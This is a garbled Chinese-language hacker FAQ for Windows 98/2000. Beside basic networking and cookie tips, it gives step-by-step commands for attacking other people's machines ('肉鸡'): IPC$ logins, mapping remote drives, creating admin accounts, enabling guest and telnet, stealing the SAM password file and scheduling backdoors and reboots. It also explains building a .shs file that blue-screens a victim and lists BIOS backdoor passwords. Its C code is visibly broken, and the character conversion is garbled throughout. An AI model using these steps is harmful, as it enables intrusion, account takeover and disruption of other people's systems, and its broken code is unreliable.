如何查看本机所开端口

FIN-WAIT-1：等待远程TCP链接中断请求，或先前的链接中断请求的确认

FIN-WAIT-2：从远程TCP等待链接中断请求

CLOSE-WAIT：等待从本地用户发来的链接中断请求

CLOSING：等待远程TCP对链接中断的确认

LAST-ACK：等待原来的发向远程TCP的链接中断请求的确认

TIME-WAIT：等待足够的时间以确保远程TCP接收到链接中断请求的确认

CLOSED：没有任何链接状态

2）如何得到一个IP地址的主机名？

利用ping -a ip 命令查看！再第一行的pinging后面的 『ip』前面的英文就是对方主机名！

一样道理，利用ping machine_name也能够获得对方的ip

得到一个网站的ip地址的方法是：ping www.***.com

好比想知道sohu的ip，就用ping http://www.sohu.com/来查看就能够了

顺便说一句：若是返回：Reply from *.*.*.*: TTL expired in transit的话，呵呵，表明TTL（生命周期）在
传输过程当中过时

什么意思呢？我来解释一下！

致使这个问题出现的缘由有两个：1）TTL值过小！TTL值小于你和对方主机之间通过的路由器数目。
2）路由器
数量太多，通过路由器的数量大于TTL值！

呵呵，其实这两点是一个意思！只不过说法不一样而已！

3）如何查看本机的ip地址？

用ipconfig来查看就能够！

也能够再Windows中的开始菜单，运行中输入winipcfg，一样能够看到本身的ip

ipconfig命令后面若是加一个参数 /all的话，能够获得更加详细的资料，好比DNS、网关等……

4）再使用net命令的时候遇到一些错误代码，如何查看对应的错误信息？

用命令 net helpmsg erorr_code来查看就能够了

好比错误代码为：88

则查看命令为：net helpmsg 88 下面有这个错误代码的中文显示！

5）利用telnet链接到对方主机上，想得到一些系统信息，用什么命令？

set命令能够很好的完成你所须要收集信息的任务的！

方法：再cmd下直接输入set（telnet对方主机之后，也是直接set就能够了～而后可以获得NNNNN多的信息）

再这里，computername：呵呵，还用说么？主机名！

OS＝Windows_NT ：操做系统的类型哦～

path＝C:\perl\bin\ ：（perl的解释器位置！）

systemDrive=c: 操做系统盘符！

USERNAME=coldcrysky 当前登录使用机器的用户

……

（6）跟踪路由器的命令是什么？

tracert 格式：tracert ip

中间会列出全部通过的路由器列表！这些路由器若是是暴露再防火墙外面的话，还能够看到路由的IP哦～呵呵
（这里又涉及到了另一个问题：为何要把路由放在防火墙后面？缘由呢，主要有两点：1）保护路由器！因
为如今愈来愈多的***和***已经开始瞄准路由器了～若是直接把路由暴露在外面，呵呵，是很是危险的！被DoS
了就很差了啊～呵呵，因此要放在防火墙里面；2）为路由器减小负担！若是全部的过滤功能通通都压在路由器上
面，呵呵，路由器的负担就太大了！）

固然，利用pathping也能够达到一样效果！格式与tracert同样！

7）简单介绍一下cookie！

cookie，又名小甜点。

它的做用：记录访问者的一些信息。例如利用cookie记录你所登录这个网页的次数、登录时曾经输入的信息……

最多见的是，你们再登录论坛（邮箱）的时候，常常在输入第一个字母的时候，每每下面就显示出了全部在本机
登录过该论坛（邮箱）的用户名吧？呵呵，这个就是cookie的做用！

你们在Administrator的cookies目录中能够看到不少的记事本文档吧？这些都是cookie，虽然通过了加密，可是
仔细查找的话，仍然可以看到一些敏感信息！何况如今也已经有了专门查看cookie的软件！利用这些软件，你的
隐私将不保哦～

那么，如何清除cookie呢？通常状况下，能够在Internet选项中的常规选项卡中看到一个删除cookies的按钮，点
击就能够清楚掉了～

除此之外，还要在internet选项中的内容选项卡中找到自动完成按钮，把里面的四项都选中！而后点击清除表单，
清除密码～

而后到操做系统目录所在的分区中！进入Winnt（98为windows）目录（固然了，这些都是默认的目录！若是你安
装的时候更名了，就对应的去相应目录）以后找到Temporary Internet Files目录（2000的目录在c:\Documents
and settings\administrator\Local settings\Temporary Internet Files）98直接到windows目录下找Temporary Internet Files就能够了～，找到这个文件夹后，打开！看到里面有NNNNNNNNNNNN多的文件了么？呵呵，这些是你
浏览过的网页的记录（有的时候从网站上面看到漂亮的FLASH，但是不能保存怎么办？只要在线浏览一遍之后，断
线到这里来找*.swf，以后依次打开查看的话，相信你会找到你所须要的FLASH的！），好了，跑题了～继续说：这
些文件是网站的页面记录，直接删除就能够了！

另外，有没有完全禁止cookie的方法呢？

呵呵，固然有了！在IE的Internet选项中，找到隐私选项卡！，把里面的滑块拖到最上面，边上写着：阻止全部cookie，呵呵，是否是？

另一种方法：找到Windows目录下的cookies目录！把里面的txt文件所有删除！，最后应该只剩下一个index.dat
文件！以后把这个文件夹设置成只读就能够了～

不过，禁止cookie后，大部分的论坛都没法正常登录了啊！呵呵，到底禁止不由止就看你本身的了～

8）安装2000的时候，速度会特别特别特别慢，怎么加快安装速度呢？

在DOS上面安装，应该用98启动光盘来引导系统！而后按照下面的方法来作，能够提升安装速度：

g:\>cd windows -------假设G为光驱 windows为98的安装目录！
g:\windows>smartdrv -------加载smartdrv程序！加载后没有任何提示信息！只要不返回错误信息就是加载成功
了～这时候安装2K的话，速度会很快的哦～

 

9）Windows2K密码忘记了，如何才能进入系统？

Windows2K的用户配置信息和密码保存在SAM文件里！该文件位于：c:\winnt\system32\config目录中！只要删除
这个文件就能够了～

另外，在c:\winnt\repair目录中也一样有一个SAM文件（这个是前者的备份！）若是你在登录肉鸡的时候，copy
前面那个目录中的SAM文件，你会发现COPY不下来！呵呵，为何？由于运行着的2K系统会保护SAM文件啊～这个
时候你就COPY这个就能够了！

10)ping不到，tracert不到，可是却能用nbtstat显示对方的一些信息，为何？

由于tracert和ping命令使用的是ICMP协议！而nbtstat是经过对方的netbios端口来得到对方的主机信息的！使
用的是UDP和TCP协议！若是对方仅仅只对ICMP协议作了禁止的话，那经过这个命令得到系统信息是正常的！

11）telnet上去后，如何给对方开共享？

开共享的命令以下：net share c=c:\winnt\system 返回共享成功

以后直接利用\\ip\c来访问对方的system目录了～删除共享用

share c /del 命令就能够了

12）如何判断对方的具体操做系统版本？

首先用ver命令查看对方的版本号！

若是是5.00.2195的话，为2K；5.1.2600为XP

从这里能够区分出来究竟是2K仍是XP了～下面进行更加具体的区分！

2K的pro和svr版本区分：

在telnet下，net shart查看启动的服务～若是对方开启了Terminal Services服务的话，基本上能够判断为svr
以上的版本了～若是没有开启，则为pro！（具体方法有三种，由于前几天在论坛中我回复过暗界了～因此这里
就再也不重复了～）

XP的pro和home版的区分：

home edition是没法安装iis的！因此，能够经过iis服务来判断究竟是home版或者是pro了～

固然了，若是对方是pro，可是将iis删除（停用）的话，就没办法判断了～呵呵

13）如何查看98的随机启动的程序？

在98下有一个实用配置程序（msconfig），中文名为：系统配置实用程序，调用的方法是在：开始--运行中输入msconfig，在里面，有一个启动的选项卡，点击后，能够看到不少随即启动程序，若是前面带有钩的话，就是启
动时随机启动的，取消的话就是把前面的小钩去掉就能够了～（若是在这里查看到了一些未知的启动文件--好比
没有文件的具体路径，或者没有文件名的话，最好取消它的自启动！由于颇有多是***！）

除了这里之外，还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡，他们分别对应这几个文件！
只不过在这里更方便查看而已！

 

14）设置了BIOS密码，但是却忘记了，该怎么办？

若是是能够进入Windows的话，能够找找biospwds和cmospwd这两个软件看看～

还有利用DEBUG法：

简单介绍两种：

1）-o 70 16
-o 71 13
-q

2）-o 70 16
-o 71 16
-q

另外一种方法：copy法：

copy con cmos.com

输入下面10个字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格，而后按下F6并回车，
退出，运行这个cmos.com程序就能够了～

恩，若是不能进入Windows怎么办呢？

简单介绍两种方法：

1）用通用密码：

Award Bios密码：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589

AMI bios密码：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.

这是常见的密码，不妨试试～

若是不行的话，能够利用CMOS放电：

就是把主板上的电池取下来，等一下子再插上去～

15）如何自制一个让98蓝屏的×××？

恩，这个是前几天QQ上面朋友问个人问题，整理的时候忽然间想起来了，就写一下好了～

首先，打开Word，再插入菜单中选择对象，这时，弹出对象包装程序窗口，再这个窗口中，点击导入，随便找一
个文本或者程序就能够！以后点：编辑菜单。这里选择命令行，出现一个命令行窗口，在里面协商c:\con\con，
点击保存，完成后，再点编辑包中的复制包，把他随便到一个地方复制下来，以后看到的是一个名位片段的东西！
给这个文件起一个名字，呵呵，传给那个可怜的家伙吧，等待他蓝屏，掉线！

（这个命令行中能够插入不少的命令，不见得非要用这个98蓝屏漏洞哦～）顺便说一下：这个已经不是什么新鲜
的技术了，这个技术的名字叫作：碎片对象。呵呵，碎片？记忆碎片么？不是的！他的后缀是：.shs！之因此说
一下这个，是由于有的朋友还不知道～作一个整理而已！不知道的朋友看事后就知道了，知道的朋友就权当复习
了～另外，不要利用这个方法作破坏！不然后果自负！

16）如何再命令行下杀死对方进程？

利用微软的2K以上操做系统都是含有这个工具的！该工具包含在2K光盘的\support\tools文件夹下！里面有安
装程序，点击后，就安装了2K的support tools工具包，里面有kill这个工具，这时候再cmd下能够输入kill/?，
就能够看到帮助了，使用这个命令的格式是：kill pid （pid是进程的ID号！）再任务管理器中能够看到进程
的ID号！（不知道有几位朋友用过蓝色火焰？呵呵，用法跟这个一摸同样！还有不少相似的***、后门软件都
有相似的功能！这个是windows自带的大***『后门工具』而已！）

这时候，有朋友问了，那再命令行下如何查看进程呢？呵呵，这就用到了系统自带的有一个后门工具了：再刚
才说得那个目录中，还有一个工具叫tlist 看名字就能看出来是干什么的吧？用法更简单！直接输入tlist就
能够获得pid遇队形程序的列表了～

那对方机器若是没有安装这两个程序怎么办呢？不要紧，你把你操做系统盘符下面programfiles\support tools
目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就能够了！呵呵～

17）上次说了ping的基本用法，此次谈谈ping的命令参数！

这个是本次问题集的重点部分！不管是小鸟仍是老鸟，大家能保证你真的对这些参数了如指掌么？恐怕都未必！
仍是好好看看吧！

这是TCP／IP协议中最有用的命令之一

它给另外一个系统发送一系列的数据包，该系统自己又发回一个响应，这条实用程序对查找远程主机颇有用，它返
回的结果表示是否能到达主机，宿主机发送一个返回数据包须要多长时间。

Usage： ping ［-t］ ［-a］ ［-n count］ ［-l size］ ［-f］ ［-i TTL］ ［-v TOS］
［-r count］ ［-s count］ ［［-j host-list］ ［-k host-list］］
［-w timeout］ destination-list

Options：

-t Ping the specifed host until interrupted.（除非人为停止，不然一直ping下去）

-a Resolve addresses to hostnames.（把IP转为主机名）

-n count Number of echo requests to send.（响应请求的数量）

-l size Send buffer size.（封包的大小）

-f Set Don`t Fragment flag in packet.（信息包中无碎片）

-i TTL Time To Live.（时间）

-v TOS Type Of Service.（服务类型）

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.（较严格的……唉，怎么译好……算了，放着吧）

-w timeout Timeout in milliseconds to wait for each reply.（timeout的时间）

好比你们可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段你们所谓ping死霉国佬时所用
的命令（固然这样只会形成我方本身的网络阻塞）。

其实这个命令主要是用来看对方应答的速度，若是怎么ping 获得的结果都是request time out。那恐怕你根本就
不用你去找这台主机了，它不在你的射程以内。

18）如何查看本机的DNS服务器？

ipconfig实际上是能够的（呵呵，上次就介绍过这个命令），除此之外，还能够利用一个命令：再cmd下输入netsh，
进入到netsh>提示符，再输入：int ip 进入到interface ip> 而后再次输入dump，这时候屏幕上出现当前链接的
配置状况了

这里必须介绍一下netsh究竟是做什么用的！这个命令比较复杂，他包含了不少的子命令，因此这里只对部分命令
进行讲解：

1）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface 回车 以后：ip 回车 再以后：show
address 回车 这样，就能够看到当前链接的IP地址和子网掩码。（其实这个命令不如ipconfig简单，也不如ipconfig/all全面）

2）修改网络配置：接着上面的命令，咱们使用：set address name=“本地链接” source=static
addr=192.168.0.200 mask=255.255.255.0，这样就修改了当前的IP地址，用show address来看看
（或者用ipconfig）

3）显示一个完整的网络配置教本：

刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示网络配置上，仍是有
本身的特点的！例如：再interface ip>状态下输入：dump，会显示一个清单，显示全部本地链接
（无论你是否使用～）与netstat -an不彻底同样！

这就是netsh的简单介绍和最基础的用法！但愿你们可以掌握！还能够输入？来查看帮助！（要在netsh>提示符
下才能查看帮助啊～）

19）肉鸡上的部分文件没法删除，怎么办？

若是对方的文件夹是只读的话，会出现拒绝访问的字样！这时候，咱们能够再del命令后面加上/f参数来删除！

20）再说一个能够限制用户登录时间的命令！

再net命令中就能够实现这样的功能！具体方法以下：

假如咱们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间能够登录，用这个命令：

net user coldcrysky /timesunday-monday,08:00-16:00

以后利用net user coldcrysky命令来查看登录时间的限制，能够看到是咱们所规定的时间（由于是中文的，
很容易懂，我就很少废话了）

在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！

光说了怎么设置，若是想恢复回去怎么办呢？（就是恢复成默认状态，任什么时候间均可以登录的状态）

看个人：net user coldcrysky /time:all --这样就能够了～

22)如何删除windows2K的默认贡献？

首先打开记事本，输入以下内容：

net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete

这里的c$、d$、e$……是表明默认共享的盘符～又几个就设置几个就能够了～

以后点击保存成批处理文件（后缀为：bat的文件！）！加入到启动组中就能够了～

23）139端口的又一用法

呵呵，写这个帖子的缘由是由于我答应给一个朋友回复139端口的做用来着……先声明两点：1）不要利用本帖
所提到的方法去搞恶意破坏！2）呵呵，可能许多人已经知道了139端口这个用法了～本文只想起到一个抛砖引
玉的做用！

废话很少说了～开始：

若是你使用NT主机的话，那你可要注意了！
重启NT主机的方法以下：

1：Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
创建一个IPC链接

2：net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为本身的h盘

3：copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件

4：net time \\XXX.XXX.XXX.XXX
获得对方机器时间

5：at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间！

6：at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务

7：等对方重启好了～

上面的第三步是only for Win2K的，若是是Nt，就须要用意个指定的重启程序，咱们能够本身编写一个
reboot.exe来代替reboot.bat，代码以下：
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定义重启的时候发送给全部用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://由于上面的重启不成功，因此须要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken))
return FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核仍是9X内核，选择用不一样的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;

对了，再次说明啊，别用本文提到的方法搞破坏，当心警察叔叔打PP～呵呵

24）利用批处理文件来创建一个记录3389登录者信息的记录器

因为Terminal Service默认是没有日志记录的，只能依靠他的系统日志，可是系统日志只能记录一些大动做
（开启或中止服务），那么，如何用批处理文件来编写一个将是3389端口的程序呢？很简单：

创建一个批处理文件：内容以下：

@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389

以后保存！

若是有人用你的3389登录你的机器，呵呵，在c盘下就有3389log.txt这个文件！记录了当天日志，还有链接
时间……资料～开始反击～呵呵

25）网络命令小节

A、NET命令：

IPC链接：格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『创建IPC链接～』
net use \\对方IP\ipc$ /delete 『断开链接～』

如下操做须要在链接到对方主机后才可进行！！！

net user coldcrysky xyz /add 『在链接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』

net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-觉得着权限的
提升啊！！！^_^』

net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照须要更改映射盘符！』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改成COLDCRYSKY』

B、AT命令：

查看远程机时间：net time \\对方IP

加入一项新任务：

at \\对方IP 时间 文件名 『用来把本身上传的后门程序在制定时间运行，方便之后进入肉鸡！』

C、TELNET命令：

telnet 对方IP 端口 『做用不用我说了吧？？？』

D、FTP命令：

登录：ftp 对方网址（IP地址）
上传文件：get 文件在本机完整路径 对方文件存放完整路径
下载文件：put 对方文件完整路径 本机存放文件路径

E、COPY命令：

在创建链接后（尤为是IPC$链接后，颇有用的命令哦～）
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下，若是要放到对方的NT目录下，则把C改成admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令：

主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！

G、NBTSTAT命令：

nbtstat -A 对方IP （这个A大写）

『在其中显示<037>前面的英文或数字就是计算机名称！固然，也能够利用PING -A 对方ip的方法来查看对方主
机名！效果相同！！！』

H、SHUTDOWN命令：

『用来关闭对方NT服务的命令』格式以下：
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务！因为对对方机器影响较大，慎用！！！』

I、DIR命令：